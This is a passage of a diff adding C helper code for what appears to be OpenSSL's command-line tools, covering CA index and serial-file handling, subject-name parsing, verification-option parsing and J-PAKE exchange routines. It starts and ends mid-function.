+    return (strcmp(aa, bb));
+}
+
+static int index_name_qual(char **a)
+{
+    return (a[0][0] == 'V');
+}
+
+static unsigned long index_name_hash(const OPENSSL_CSTRING *a)
+{
+    return (lh_strhash(a[DB_name]));
+}
+
+int index_name_cmp(const OPENSSL_CSTRING *a, const OPENSSL_CSTRING *b)
+{
+    return (strcmp(a[DB_name], b[DB_name]));
+}
+
+static IMPLEMENT_LHASH_HASH_FN(index_serial, OPENSSL_CSTRING)
+static IMPLEMENT_LHASH_COMP_FN(index_serial, OPENSSL_CSTRING)
+static IMPLEMENT_LHASH_HASH_FN(index_name, OPENSSL_CSTRING)
+static IMPLEMENT_LHASH_COMP_FN(index_name, OPENSSL_CSTRING)
+#undef BSIZE
+#define BSIZE 256
+BIGNUM *load_serial(char *serialfile, int create, ASN1_INTEGER **retai)
+{
+    BIO *in = NULL;
+    BIGNUM *ret = NULL;
+    MS_STATIC char buf[1024];
+    ASN1_INTEGER *ai = NULL;
+
+    ai = ASN1_INTEGER_new();
+    if (ai == NULL)
+        goto err;
+
+    if ((in = BIO_new(BIO_s_file())) == NULL) {
+        ERR_print_errors(bio_err);
+        goto err;
+    }
+
+    if (BIO_read_filename(in, serialfile) <= 0) {
+        if (!create) {
+            perror(serialfile);
+            goto err;
+        } else {
+            ret = BN_new();
+            if (ret == NULL || !rand_serial(ret, ai))
+                BIO_printf(bio_err, "Out of memory\n");
+        }
+    } else {
+        if (!a2i_ASN1_INTEGER(in, ai, buf, 1024)) {
+            BIO_printf(bio_err, "unable to load number from %s\n",
+                       serialfile);
+            goto err;
+        }
+        ret = ASN1_INTEGER_to_BN(ai, NULL);
+        if (ret == NULL) {
+            BIO_printf(bio_err,
+                       "error converting number from bin to BIGNUM\n");
+            goto err;
+        }
+    }
+
+    if (ret && retai) {
+        *retai = ai;
+        ai = NULL;
+    }
+ err:
+    if (in != NULL)
+        BIO_free(in);
+    if (ai != NULL)
+        ASN1_INTEGER_free(ai);
+    return (ret);
+}
+
+int save_serial(char *serialfile, char *suffix, BIGNUM *serial,
+                ASN1_INTEGER **retai)
+{
+    char buf[1][BSIZE];
+    BIO *out = NULL;
+    int ret = 0;
+    ASN1_INTEGER *ai = NULL;
+    int j;
+
+    if (suffix == NULL)
+        j = strlen(serialfile);
+    else
+        j = strlen(serialfile) + strlen(suffix) + 1;
+    if (j >= BSIZE) {
+        BIO_printf(bio_err, "file name too long\n");
+        goto err;
+    }
+
+    if (suffix == NULL)
+        BUF_strlcpy(buf[0], serialfile, BSIZE);
+    else {
+#ifndef OPENSSL_SYS_VMS
+        j = BIO_snprintf(buf[0], sizeof buf[0], "%s.%s", serialfile, suffix);
+#else
+        j = BIO_snprintf(buf[0], sizeof buf[0], "%s-%s", serialfile, suffix);
+#endif
+    }
+#ifdef RL_DEBUG
+    BIO_printf(bio_err, "DEBUG: writing \"%s\"\n", buf[0]);
+#endif
+    out = BIO_new(BIO_s_file());
+    if (out == NULL) {
+        ERR_print_errors(bio_err);
+        goto err;
+    }
+    if (BIO_write_filename(out, buf[0]) <= 0) {
+        perror(serialfile);
+        goto err;
+    }
+
+    if ((ai = BN_to_ASN1_INTEGER(serial, NULL)) == NULL) {
+        BIO_printf(bio_err, "error converting serial to ASN.1 format\n");
+        goto err;
+    }
+    i2a_ASN1_INTEGER(out, ai);
+    BIO_puts(out, "\n");
+    ret = 1;
+    if (retai) {
+        *retai = ai;
+        ai = NULL;
+    }
+ err:
+    if (out != NULL)
+        BIO_free_all(out);
+    if (ai != NULL)
+        ASN1_INTEGER_free(ai);
+    return (ret);
+}
+
+int rotate_serial(char *serialfile, char *new_suffix, char *old_suffix)
+{
+    char buf[5][BSIZE];
+    int i, j;
+
+    i = strlen(serialfile) + strlen(old_suffix);
+    j = strlen(serialfile) + strlen(new_suffix);
+    if (i > j)
+        j = i;
+    if (j + 1 >= BSIZE) {
+        BIO_printf(bio_err, "file name too long\n");
+        goto err;
+    }
+#ifndef OPENSSL_SYS_VMS
+    j = BIO_snprintf(buf[0], sizeof buf[0], "%s.%s", serialfile, new_suffix);
+#else
+    j = BIO_snprintf(buf[0], sizeof buf[0], "%s-%s", serialfile, new_suffix);
+#endif
+#ifndef OPENSSL_SYS_VMS
+    j = BIO_snprintf(buf[1], sizeof buf[1], "%s.%s", serialfile, old_suffix);
+#else
+    j = BIO_snprintf(buf[1], sizeof buf[1], "%s-%s", serialfile, old_suffix);
+#endif
+#ifdef RL_DEBUG
+    BIO_printf(bio_err, "DEBUG: renaming \"%s\" to \"%s\"\n",
+               serialfile, buf[1]);
+#endif
+    if (rename(serialfile, buf[1]) < 0 && errno != ENOENT
+#ifdef ENOTDIR
+        && errno != ENOTDIR
+#endif
+        ) {
+        BIO_printf(bio_err,
+                   "unable to rename %s to %s\n", serialfile, buf[1]);
+        perror("reason");
+        goto err;
+    }
+#ifdef RL_DEBUG
+    BIO_printf(bio_err, "DEBUG: renaming \"%s\" to \"%s\"\n",
+               buf[0], serialfile);
+#endif
+    if (rename(buf[0], serialfile) < 0) {
+        BIO_printf(bio_err,
+                   "unable to rename %s to %s\n", buf[0], serialfile);
+        perror("reason");
+        rename(buf[1], serialfile);
+        goto err;
+    }
+    return 1;
+ err:
+    return 0;
+}
+
+int rand_serial(BIGNUM *b, ASN1_INTEGER *ai)
+{
+    BIGNUM *btmp;
+    int ret = 0;
+    if (b)
+        btmp = b;
+    else
+        btmp = BN_new();
+
+    if (!btmp)
+        return 0;
+
+    if (!BN_pseudo_rand(btmp, SERIAL_RAND_BITS, 0, 0))
+        goto error;
+    if (ai && !BN_to_ASN1_INTEGER(btmp, ai))
+        goto error;
+
+    ret = 1;
+
+ error:
+
+    if (!b)
+        BN_free(btmp);
+
+    return ret;
+}
+
+CA_DB *load_index(char *dbfile, DB_ATTR *db_attr)
+{
+    CA_DB *retdb = NULL;
+    TXT_DB *tmpdb = NULL;
+    BIO *in = BIO_new(BIO_s_file());
+    CONF *dbattr_conf = NULL;
+    char buf[1][BSIZE];
+    long errorline = -1;
+
+    if (in == NULL) {
+        ERR_print_errors(bio_err);
+        goto err;
+    }
+    if (BIO_read_filename(in, dbfile) <= 0) {
+        perror(dbfile);
+        BIO_printf(bio_err, "unable to open '%s'\n", dbfile);
+        goto err;
+    }
+    if ((tmpdb = TXT_DB_read(in, DB_NUMBER)) == NULL)
+        goto err;
+
+#ifndef OPENSSL_SYS_VMS
+    BIO_snprintf(buf[0], sizeof buf[0], "%s.attr", dbfile);
+#else
+    BIO_snprintf(buf[0], sizeof buf[0], "%s-attr", dbfile);
+#endif
+    dbattr_conf = NCONF_new(NULL);
+    if (NCONF_load(dbattr_conf, buf[0], &errorline) <= 0) {
+        if (errorline > 0) {
+            BIO_printf(bio_err,
+                       "error on line %ld of db attribute file '%s'\n",
+                       errorline, buf[0]);
+            goto err;
+        } else {
+            NCONF_free(dbattr_conf);
+            dbattr_conf = NULL;
+        }
+    }
+
+    if ((retdb = OPENSSL_malloc(sizeof(CA_DB))) == NULL) {
+        fprintf(stderr, "Out of memory\n");
+        goto err;
+    }
+
+    retdb->db = tmpdb;
+    tmpdb = NULL;
+    if (db_attr)
+        retdb->attributes = *db_attr;
+    else {
+        retdb->attributes.unique_subject = 1;
+    }
+
+    if (dbattr_conf) {
+        char *p = NCONF_get_string(dbattr_conf, NULL, "unique_subject");
+        if (p) {
+#ifdef RL_DEBUG
+            BIO_printf(bio_err,
+                       "DEBUG[load_index]: unique_subject = \"%s\"\n", p);
+#endif
+            retdb->attributes.unique_subject = parse_yesno(p, 1);
+        }
+    }
+
+ err:
+    if (dbattr_conf)
+        NCONF_free(dbattr_conf);
+    if (tmpdb)
+        TXT_DB_free(tmpdb);
+    if (in)
+        BIO_free_all(in);
+    return retdb;
+}
+
+int index_index(CA_DB *db)
+{
+    if (!TXT_DB_create_index(db->db, DB_serial, NULL,
+                             LHASH_HASH_FN(index_serial),
+                             LHASH_COMP_FN(index_serial))) {
+        BIO_printf(bio_err,
+                   "error creating serial number index:(%ld,%ld,%ld)\n",
+                   db->db->error, db->db->arg1, db->db->arg2);
+        return 0;
+    }
+
+    if (db->attributes.unique_subject
+        && !TXT_DB_create_index(db->db, DB_name, index_name_qual,
+                                LHASH_HASH_FN(index_name),
+                                LHASH_COMP_FN(index_name))) {
+        BIO_printf(bio_err, "error creating name index:(%ld,%ld,%ld)\n",
+                   db->db->error, db->db->arg1, db->db->arg2);
+        return 0;
+    }
+    return 1;
+}
+
+int save_index(const char *dbfile, const char *suffix, CA_DB *db)
+{
+    char buf[3][BSIZE];
+    BIO *out = BIO_new(BIO_s_file());
+    int j;
+
+    if (out == NULL) {
+        ERR_print_errors(bio_err);
+        goto err;
+    }
+
+    j = strlen(dbfile) + strlen(suffix);
+    if (j + 6 >= BSIZE) {
+        BIO_printf(bio_err, "file name too long\n");
+        goto err;
+    }
+#ifndef OPENSSL_SYS_VMS
+    j = BIO_snprintf(buf[2], sizeof buf[2], "%s.attr", dbfile);
+#else
+    j = BIO_snprintf(buf[2], sizeof buf[2], "%s-attr", dbfile);
+#endif
+#ifndef OPENSSL_SYS_VMS
+    j = BIO_snprintf(buf[1], sizeof buf[1], "%s.attr.%s", dbfile, suffix);
+#else
+    j = BIO_snprintf(buf[1], sizeof buf[1], "%s-attr-%s", dbfile, suffix);
+#endif
+#ifndef OPENSSL_SYS_VMS
+    j = BIO_snprintf(buf[0], sizeof buf[0], "%s.%s", dbfile, suffix);
+#else
+    j = BIO_snprintf(buf[0], sizeof buf[0], "%s-%s", dbfile, suffix);
+#endif
+#ifdef RL_DEBUG
+    BIO_printf(bio_err, "DEBUG: writing \"%s\"\n", buf[0]);
+#endif
+    if (BIO_write_filename(out, buf[0]) <= 0) {
+        perror(dbfile);
+        BIO_printf(bio_err, "unable to open '%s'\n", dbfile);
+        goto err;
+    }
+    j = TXT_DB_write(out, db->db);
+    if (j <= 0)
+        goto err;
+
+    BIO_free(out);
+
+    out = BIO_new(BIO_s_file());
+#ifdef RL_DEBUG
+    BIO_printf(bio_err, "DEBUG: writing \"%s\"\n", buf[1]);
+#endif
+    if (BIO_write_filename(out, buf[1]) <= 0) {
+        perror(buf[2]);
+        BIO_printf(bio_err, "unable to open '%s'\n", buf[2]);
+        goto err;
+    }
+    BIO_printf(out, "unique_subject = %s\n",
+               db->attributes.unique_subject ? "yes" : "no");
+    BIO_free(out);
+
+    return 1;
+ err:
+    return 0;
+}
+
+int rotate_index(const char *dbfile, const char *new_suffix,
+                 const char *old_suffix)
+{
+    char buf[5][BSIZE];
+    int i, j;
+
+    i = strlen(dbfile) + strlen(old_suffix);
+    j = strlen(dbfile) + strlen(new_suffix);
+    if (i > j)
+        j = i;
+    if (j + 6 >= BSIZE) {
+        BIO_printf(bio_err, "file name too long\n");
+        goto err;
+    }
+#ifndef OPENSSL_SYS_VMS
+    j = BIO_snprintf(buf[4], sizeof buf[4], "%s.attr", dbfile);
+#else
+    j = BIO_snprintf(buf[4], sizeof buf[4], "%s-attr", dbfile);
+#endif
+#ifndef OPENSSL_SYS_VMS
+    j = BIO_snprintf(buf[2], sizeof buf[2], "%s.attr.%s", dbfile, new_suffix);
+#else
+    j = BIO_snprintf(buf[2], sizeof buf[2], "%s-attr-%s", dbfile, new_suffix);
+#endif
+#ifndef OPENSSL_SYS_VMS
+    j = BIO_snprintf(buf[0], sizeof buf[0], "%s.%s", dbfile, new_suffix);
+#else
+    j = BIO_snprintf(buf[0], sizeof buf[0], "%s-%s", dbfile, new_suffix);
+#endif
+#ifndef OPENSSL_SYS_VMS
+    j = BIO_snprintf(buf[1], sizeof buf[1], "%s.%s", dbfile, old_suffix);
+#else
+    j = BIO_snprintf(buf[1], sizeof buf[1], "%s-%s", dbfile, old_suffix);
+#endif
+#ifndef OPENSSL_SYS_VMS
+    j = BIO_snprintf(buf[3], sizeof buf[3], "%s.attr.%s", dbfile, old_suffix);
+#else
+    j = BIO_snprintf(buf[3], sizeof buf[3], "%s-attr-%s", dbfile, old_suffix);
+#endif
+#ifdef RL_DEBUG
+    BIO_printf(bio_err, "DEBUG: renaming \"%s\" to \"%s\"\n", dbfile, buf[1]);
+#endif
+    if (rename(dbfile, buf[1]) < 0 && errno != ENOENT
+#ifdef ENOTDIR
+        && errno != ENOTDIR
+#endif
+        ) {
+        BIO_printf(bio_err, "unable to rename %s to %s\n", dbfile, buf[1]);
+        perror("reason");
+        goto err;
+    }
+#ifdef RL_DEBUG
+    BIO_printf(bio_err, "DEBUG: renaming \"%s\" to \"%s\"\n", buf[0], dbfile);
+#endif
+    if (rename(buf[0], dbfile) < 0) {
+        BIO_printf(bio_err, "unable to rename %s to %s\n", buf[0], dbfile);
+        perror("reason");
+        rename(buf[1], dbfile);
+        goto err;
+    }
+#ifdef RL_DEBUG
+    BIO_printf(bio_err, "DEBUG: renaming \"%s\" to \"%s\"\n", buf[4], buf[3]);
+#endif
+    if (rename(buf[4], buf[3]) < 0 && errno != ENOENT
+#ifdef ENOTDIR
+        && errno != ENOTDIR
+#endif
+        ) {
+        BIO_printf(bio_err, "unable to rename %s to %s\n", buf[4], buf[3]);
+        perror("reason");
+        rename(dbfile, buf[0]);
+        rename(buf[1], dbfile);
+        goto err;
+    }
+#ifdef RL_DEBUG
+    BIO_printf(bio_err, "DEBUG: renaming \"%s\" to \"%s\"\n", buf[2], buf[4]);
+#endif
+    if (rename(buf[2], buf[4]) < 0) {
+        BIO_printf(bio_err, "unable to rename %s to %s\n", buf[2], buf[4]);
+        perror("reason");
+        rename(buf[3], buf[4]);
+        rename(dbfile, buf[0]);
+        rename(buf[1], dbfile);
+        goto err;
+    }
+    return 1;
+ err:
+    return 0;
+}
+
+void free_index(CA_DB *db)
+{
+    if (db) {
+        if (db->db)
+            TXT_DB_free(db->db);
+        OPENSSL_free(db);
+    }
+}
+
+int parse_yesno(const char *str, int def)
+{
+    int ret = def;
+    if (str) {
+        switch (*str) {
+        case 'f':              /* false */
+        case 'F':              /* FALSE */
+        case 'n':              /* no */
+        case 'N':              /* NO */
+        case '0':              /* 0 */
+            ret = 0;
+            break;
+        case 't':              /* true */
+        case 'T':              /* TRUE */
+        case 'y':              /* yes */
+        case 'Y':              /* YES */
+        case '1':              /* 1 */
+            ret = 1;
+            break;
+        default:
+            ret = def;
+            break;
+        }
+    }
+    return ret;
+}
+
+/*
+ * subject is expected to be in the format /type0=value0/type1=value1/type2=...
+ * where characters may be escaped by \
+ */
+X509_NAME *parse_name(char *subject, long chtype, int multirdn)
+{
+    size_t buflen = strlen(subject) + 1; /* to copy the types and values
+                                          * into. due to escaping, the copy
+                                          * can only become shorter */
+    char *buf = OPENSSL_malloc(buflen);
+    size_t max_ne = buflen / 2 + 1; /* maximum number of name elements */
+    char **ne_types = OPENSSL_malloc(max_ne * sizeof(char *));
+    char **ne_values = OPENSSL_malloc(max_ne * sizeof(char *));
+    int *mval = OPENSSL_malloc(max_ne * sizeof(int));
+
+    char *sp = subject, *bp = buf;
+    int i, ne_num = 0;
+
+    X509_NAME *n = NULL;
+    int nid;
+
+    if (!buf || !ne_types || !ne_values || !mval) {
+        BIO_printf(bio_err, "malloc error\n");
+        goto error;
+    }
+
+    if (*subject != '/') {
+        BIO_printf(bio_err, "Subject does not start with '/'.\n");
+        goto error;
+    }
+    sp++;                       /* skip leading / */
+
+    /* no multivalued RDN by default */
+    mval[ne_num] = 0;
+
+    while (*sp) {
+        /* collect type */
+        ne_types[ne_num] = bp;
+        while (*sp) {
+            if (*sp == '\\') {  /* is there anything to escape in the
+                                 * type...? */
+                if (*++sp)
+                    *bp++ = *sp++;
+                else {
+                    BIO_printf(bio_err,
+                               "escape character at end of string\n");
+                    goto error;
+                }
+            } else if (*sp == '=') {
+                sp++;
+                *bp++ = '\0';
+                break;
+            } else
+                *bp++ = *sp++;
+        }
+        if (!*sp) {
+            BIO_printf(bio_err,
+                       "end of string encountered while processing type of subject name element #%d\n",
+                       ne_num);
+            goto error;
+        }
+        ne_values[ne_num] = bp;
+        while (*sp) {
+            if (*sp == '\\') {
+                if (*++sp)
+                    *bp++ = *sp++;
+                else {
+                    BIO_printf(bio_err,
+                               "escape character at end of string\n");
+                    goto error;
+                }
+            } else if (*sp == '/') {
+                sp++;
+                /* no multivalued RDN by default */
+                mval[ne_num + 1] = 0;
+                break;
+            } else if (*sp == '+' && multirdn) {
+                /*
+                 * a not escaped + signals a mutlivalued RDN
+                 */
+                sp++;
+                mval[ne_num + 1] = -1;
+                break;
+            } else
+                *bp++ = *sp++;
+        }
+        *bp++ = '\0';
+        ne_num++;
+    }
+
+    if (!(n = X509_NAME_new()))
+        goto error;
+
+    for (i = 0; i < ne_num; i++) {
+        if ((nid = OBJ_txt2nid(ne_types[i])) == NID_undef) {
+            BIO_printf(bio_err,
+                       "Subject Attribute %s has no known NID, skipped\n",
+                       ne_types[i]);
+            continue;
+        }
+
+        if (!*ne_values[i]) {
+            BIO_printf(bio_err,
+                       "No value provided for Subject Attribute %s, skipped\n",
+                       ne_types[i]);
+            continue;
+        }
+
+        if (!X509_NAME_add_entry_by_NID
+            (n, nid, chtype, (unsigned char *)ne_values[i], -1, -1, mval[i]))
+            goto error;
+    }
+
+    OPENSSL_free(ne_values);
+    OPENSSL_free(ne_types);
+    OPENSSL_free(buf);
+    OPENSSL_free(mval);
+    return n;
+
+ error:
+    X509_NAME_free(n);
+    if (ne_values)
+        OPENSSL_free(ne_values);
+    if (ne_types)
+        OPENSSL_free(ne_types);
+    if (mval)
+        OPENSSL_free(mval);
+    if (buf)
+        OPENSSL_free(buf);
+    return NULL;
+}
+
+int args_verify(char ***pargs, int *pargc,
+                int *badarg, BIO *err, X509_VERIFY_PARAM **pm)
+{
+    ASN1_OBJECT *otmp = NULL;
+    unsigned long flags = 0;
+    int i;
+    int purpose = 0, depth = -1;
+    char **oldargs = *pargs;
+    char *arg = **pargs, *argn = (*pargs)[1];
+    time_t at_time = 0;
+    char *hostname = NULL;
+    char *email = NULL;
+    char *ipasc = NULL;
+    if (!strcmp(arg, "-policy")) {
+        if (!argn)
+            *badarg = 1;
+        else {
+            otmp = OBJ_txt2obj(argn, 0);
+            if (!otmp) {
+                BIO_printf(err, "Invalid Policy \"%s\"\n", argn);
+                *badarg = 1;
+            }
+        }
+        (*pargs)++;
+    } else if (strcmp(arg, "-purpose") == 0) {
+        X509_PURPOSE *xptmp;
+        if (!argn)
+            *badarg = 1;
+        else {
+            i = X509_PURPOSE_get_by_sname(argn);
+            if (i < 0) {
+                BIO_printf(err, "unrecognized purpose\n");
+                *badarg = 1;
+            } else {
+                xptmp = X509_PURPOSE_get0(i);
+                purpose = X509_PURPOSE_get_id(xptmp);
+            }
+        }
+        (*pargs)++;
+    } else if (strcmp(arg, "-verify_depth") == 0) {
+        if (!argn)
+            *badarg = 1;
+        else {
+            depth = atoi(argn);
+            if (depth < 0) {
+                BIO_printf(err, "invalid depth\n");
+                *badarg = 1;
+            }
+        }
+        (*pargs)++;
+    } else if (strcmp(arg, "-attime") == 0) {
+        if (!argn)
+            *badarg = 1;
+        else {
+            long timestamp;
+            /*
+             * interpret the -attime argument as seconds since Epoch
+             */
+            if (sscanf(argn, "%li", &timestamp) != 1) {
+                BIO_printf(bio_err, "Error parsing timestamp %s\n", argn);
+                *badarg = 1;
+            }
+            /* on some platforms time_t may be a float */
+            at_time = (time_t)timestamp;
+        }
+        (*pargs)++;
+    } else if (strcmp(arg, "-verify_hostname") == 0) {
+        if (!argn)
+            *badarg = 1;
+        hostname = argn;
+        (*pargs)++;
+    } else if (strcmp(arg, "-verify_email") == 0) {
+        if (!argn)
+            *badarg = 1;
+        email = argn;
+        (*pargs)++;
+    } else if (strcmp(arg, "-verify_ip") == 0) {
+        if (!argn)
+            *badarg = 1;
+        ipasc = argn;
+        (*pargs)++;
+    } else if (!strcmp(arg, "-ignore_critical"))
+        flags |= X509_V_FLAG_IGNORE_CRITICAL;
+    else if (!strcmp(arg, "-issuer_checks"))
+        flags |= X509_V_FLAG_CB_ISSUER_CHECK;
+    else if (!strcmp(arg, "-crl_check"))
+        flags |= X509_V_FLAG_CRL_CHECK;
+    else if (!strcmp(arg, "-crl_check_all"))
+        flags |= X509_V_FLAG_CRL_CHECK | X509_V_FLAG_CRL_CHECK_ALL;
+    else if (!strcmp(arg, "-policy_check"))
+        flags |= X509_V_FLAG_POLICY_CHECK;
+    else if (!strcmp(arg, "-explicit_policy"))
+        flags |= X509_V_FLAG_EXPLICIT_POLICY;
+    else if (!strcmp(arg, "-inhibit_any"))
+        flags |= X509_V_FLAG_INHIBIT_ANY;
+    else if (!strcmp(arg, "-inhibit_map"))
+        flags |= X509_V_FLAG_INHIBIT_MAP;
+    else if (!strcmp(arg, "-x509_strict"))
+        flags |= X509_V_FLAG_X509_STRICT;
+    else if (!strcmp(arg, "-extended_crl"))
+        flags |= X509_V_FLAG_EXTENDED_CRL_SUPPORT;
+    else if (!strcmp(arg, "-use_deltas"))
+        flags |= X509_V_FLAG_USE_DELTAS;
+    else if (!strcmp(arg, "-policy_print"))
+        flags |= X509_V_FLAG_NOTIFY_POLICY;
+    else if (!strcmp(arg, "-check_ss_sig"))
+        flags |= X509_V_FLAG_CHECK_SS_SIGNATURE;
+    else if (!strcmp(arg, "-trusted_first"))
+        flags |= X509_V_FLAG_TRUSTED_FIRST;
+    else if (!strcmp(arg, "-suiteB_128_only"))
+        flags |= X509_V_FLAG_SUITEB_128_LOS_ONLY;
+    else if (!strcmp(arg, "-suiteB_128"))
+        flags |= X509_V_FLAG_SUITEB_128_LOS;
+    else if (!strcmp(arg, "-suiteB_192"))
+        flags |= X509_V_FLAG_SUITEB_192_LOS;
+    else if (!strcmp(arg, "-partial_chain"))
+        flags |= X509_V_FLAG_PARTIAL_CHAIN;
+    else
+        return 0;
+
+    if (*badarg) {
+        if (*pm)
+            X509_VERIFY_PARAM_free(*pm);
+        *pm = NULL;
+        goto end;
+    }
+
+    if (!*pm && !(*pm = X509_VERIFY_PARAM_new())) {
+        *badarg = 1;
+        goto end;
+    }
+
+    if (otmp)
+        X509_VERIFY_PARAM_add0_policy(*pm, otmp);
+    if (flags)
+        X509_VERIFY_PARAM_set_flags(*pm, flags);
+
+    if (purpose)
+        X509_VERIFY_PARAM_set_purpose(*pm, purpose);
+
+    if (depth >= 0)
+        X509_VERIFY_PARAM_set_depth(*pm, depth);
+
+    if (at_time)
+        X509_VERIFY_PARAM_set_time(*pm, at_time);
+
+    if (hostname && !X509_VERIFY_PARAM_set1_host(*pm, hostname, 0))
+        *badarg = 1;
+
+    if (email && !X509_VERIFY_PARAM_set1_email(*pm, email, 0))
+        *badarg = 1;
+
+    if (ipasc && !X509_VERIFY_PARAM_set1_ip_asc(*pm, ipasc))
+        *badarg = 1;
+
+ end:
+
+    (*pargs)++;
+
+    if (pargc)
+        *pargc -= *pargs - oldargs;
+
+    return 1;
+
+}
+
+/*
+ * Read whole contents of a BIO into an allocated memory buffer and return
+ * it.
+ */
+
+int bio_to_mem(unsigned char **out, int maxlen, BIO *in)
+{
+    BIO *mem;
+    int len, ret;
+    unsigned char tbuf[1024];
+    mem = BIO_new(BIO_s_mem());
+    if (!mem)
+        return -1;
+    for (;;) {
+        if ((maxlen != -1) && maxlen < 1024)
+            len = maxlen;
+        else
+            len = 1024;
+        len = BIO_read(in, tbuf, len);
+        if (len <= 0)
+            break;
+        if (BIO_write(mem, tbuf, len) != len) {
+            BIO_free(mem);
+            return -1;
+        }
+        maxlen -= len;
+
+        if (maxlen == 0)
+            break;
+    }
+    ret = BIO_get_mem_data(mem, (char **)out);
+    BIO_set_flags(mem, BIO_FLAGS_MEM_RDONLY);
+    BIO_free(mem);
+    return ret;
+}
+
+int pkey_ctrl_string(EVP_PKEY_CTX *ctx, char *value)
+{
+    int rv;
+    char *stmp, *vtmp = NULL;
+    stmp = BUF_strdup(value);
+    if (!stmp)
+        return -1;
+    vtmp = strchr(stmp, ':');
+    if (vtmp) {
+        *vtmp = 0;
+        vtmp++;
+    }
+    rv = EVP_PKEY_CTX_ctrl_str(ctx, stmp, vtmp);
+    OPENSSL_free(stmp);
+    return rv;
+}
+
+static void nodes_print(BIO *out, const char *name,
+                        STACK_OF(X509_POLICY_NODE) *nodes)
+{
+    X509_POLICY_NODE *node;
+    int i;
+    BIO_printf(out, "%s Policies:", name);
+    if (nodes) {
+        BIO_puts(out, "\n");
+        for (i = 0; i < sk_X509_POLICY_NODE_num(nodes); i++) {
+            node = sk_X509_POLICY_NODE_value(nodes, i);
+            X509_POLICY_NODE_print(out, node, 2);
+        }
+    } else
+        BIO_puts(out, " <empty>\n");
+}
+
+void policies_print(BIO *out, X509_STORE_CTX *ctx)
+{
+    X509_POLICY_TREE *tree;
+    int explicit_policy;
+    int free_out = 0;
+    if (out == NULL) {
+        out = BIO_new_fp(stderr, BIO_NOCLOSE);
+        free_out = 1;
+    }
+    tree = X509_STORE_CTX_get0_policy_tree(ctx);
+    explicit_policy = X509_STORE_CTX_get_explicit_policy(ctx);
+
+    BIO_printf(out, "Require explicit Policy: %s\n",
+               explicit_policy ? "True" : "False");
+
+    nodes_print(out, "Authority", X509_policy_tree_get0_policies(tree));
+    nodes_print(out, "User", X509_policy_tree_get0_user_policies(tree));
+    if (free_out)
+        BIO_free(out);
+}
+
+#if !defined(OPENSSL_NO_JPAKE) && !defined(OPENSSL_NO_PSK)
+
+static JPAKE_CTX *jpake_init(const char *us, const char *them,
+                             const char *secret)
+{
+    BIGNUM *p = NULL;
+    BIGNUM *g = NULL;
+    BIGNUM *q = NULL;
+    BIGNUM *bnsecret = BN_new();
+    JPAKE_CTX *ctx;
+
+    /* Use a safe prime for p (that we found earlier) */
+    BN_hex2bn(&p,
+              "F9E5B365665EA7A05A9C534502780FEE6F1AB5BD4F49947FD036DBD7E905269AF46EF28B0FC07487EE4F5D20FB3C0AF8E700F3A2FA3414970CBED44FEDFF80CE78D800F184BB82435D137AADA2C6C16523247930A63B85661D1FC817A51ACD96168E95898A1F83A79FFB529368AA7833ABD1B0C3AEDDB14D2E1A2F71D99F763F");
+    g = BN_new();
+    BN_set_word(g, 2);
+    q = BN_new();
+    BN_rshift1(q, p);
+
+    BN_bin2bn((const unsigned char *)secret, strlen(secret), bnsecret);
+
+    ctx = JPAKE_CTX_new(us, them, p, g, q, bnsecret);
+    BN_free(bnsecret);
+    BN_free(q);
+    BN_free(g);
+    BN_free(p);
+
+    return ctx;
+}
+
+static void jpake_send_part(BIO *conn, const JPAKE_STEP_PART *p)
+{
+    BN_print(conn, p->gx);
+    BIO_puts(conn, "\n");
+    BN_print(conn, p->zkpx.gr);
+    BIO_puts(conn, "\n");
+    BN_print(conn, p->zkpx.b);
+    BIO_puts(conn, "\n");
+}
+
+static void jpake_send_step1(BIO *bconn, JPAKE_CTX *ctx)
+{
+    JPAKE_STEP1 s1;
+
+    JPAKE_STEP1_init(&s1);
+    JPAKE_STEP1_generate(&s1, ctx);
+    jpake_send_part(bconn, &s1.p1);
+    jpake_send_part(bconn, &s1.p2);
+    (void)BIO_flush(bconn);
+    JPAKE_STEP1_release(&s1);
+}
+
+static void jpake_send_step2(BIO *bconn, JPAKE_CTX *ctx)
+{
+    JPAKE_STEP2 s2;
+
+    JPAKE_STEP2_init(&s2);
+    JPAKE_STEP2_generate(&s2, ctx);
+    jpake_send_part(bconn, &s2);
+    (void)BIO_flush(bconn);
+    JPAKE_STEP2_release(&s2);
+}
+
+static void jpake_send_step3a(BIO *bconn, JPAKE_CTX *ctx)
+{
+    JPAKE_STEP3A s3a;
+
+    JPAKE_STEP3A_init(&s3a);
+    JPAKE_STEP3A_generate(&s3a, ctx);
+    BIO_write(bconn, s3a.hhk, sizeof s3a.hhk);
+    (void)BIO_flush(bconn);
+    JPAKE_STEP3A_release(&s3a);
+}
+
+static void jpake_send_step3b(BIO *bconn, JPAKE_CTX *ctx)
+{
+    JPAKE_STEP3B s3b;
+
+    JPAKE_STEP3B_init(&s3b);
+    JPAKE_STEP3B_generate(&s3b, ctx);
+    BIO_write(bconn, s3b.hk, sizeof s3b.hk);
+    (void)BIO_flush(bconn);
+    JPAKE_STEP3B_release(&s3b);
+}
+
+static void readbn(BIGNUM **bn, BIO *bconn)
+{
+    char buf[10240];
+    int l;
+
+    l = BIO_gets(bconn, buf, sizeof buf);
+    assert(l > 0);
+    assert(buf[l - 1] == '\n');
+    buf[l - 1] = '\0';
+    BN_hex2bn(bn, buf);
+}
+
+static void jpake_receive_part(JPAKE_STEP_PART *p, BIO *bconn)
+{
+    readbn(&p->gx, bconn);
+    readbn(&p->zkpx.gr, bconn);
+    readbn(&p->zkpx.b, bconn);
+}
+
+static void jpake_receive_step1(JPAKE_CTX *ctx, BIO *bconn)
+{
+    JPAKE_STEP1 s1;
+
+    JPAKE_STEP1_init(&s1);
+    jpake_receive_part(&s1.p1, bconn);
+    jpake_receive_part(&s1.p2, bconn);
+    if (!JPAKE_STEP1_process(ctx, &s1)) {
+        ERR_print_errors(bio_err);
+        exit(1);
+    }
+    JPAKE_STEP1_release(&s1);
+}
+
+static void jpake_receive_step2(JPAKE_CTX *ctx, BIO *bconn)
+{
+    JPAKE_STEP2 s2;
+
+    JPAKE_STEP2_init(&s2);
+    jpake_receive_part(&s2, bconn);
+    if (!JPAKE_STEP2_process(ctx, &s2)) {
+        ERR_print_errors(bio_err);
+        exit(1);
+    }
+    JPAKE_STEP2_release(&s2);
+}
+
+static void jpake_receive_step3a(JPAKE_CTX *ctx, BIO *bconn)
+{
+    JPAKE_STEP3A s3a;
+    int l;
+
+    JPAKE_STEP3A_init(&s3a);
+    l = BIO_read(bconn, s3a.hhk, sizeof s3a.hhk);
+    assert(l == sizeof s3a.hhk);
+    if (!JPAKE_STEP3A_process(ctx, &s3a)) {
